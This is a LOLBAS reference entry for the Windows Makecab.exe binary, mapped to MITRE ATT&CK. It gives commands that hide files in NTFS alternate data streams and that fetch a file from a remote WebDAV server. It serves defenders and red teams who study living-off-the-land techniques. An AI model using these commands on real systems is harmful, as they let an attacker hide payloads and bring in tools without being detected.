.. /Makecab.exe

Star

Binary to package existing files into a cabinet (.cab) file

• https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

Alternate data streams

1. Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.

   makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

   Use case

   Hide data compressed into an alternate data stream

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1564.004

   Tags

   Type: Compression

   This LOLBAS involves (de)compression of one or more files.

2. Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.

   makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab

   Use case

   Hide data compressed into an alternate data stream

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1564.004

   Tags

   Type: Compression

   This LOLBAS involves (de)compression of one or more files.

Download

1. Download and compresses the target file and stores it in the target file.

   makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

   Use case

   Download file and compress into a cab file

   Privileges required

   User

   Operating systems

   Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

   ATT&CK® technique

   T1105

   Tags

   Type: Compression

   This LOLBAS involves (de)compression of one or more files.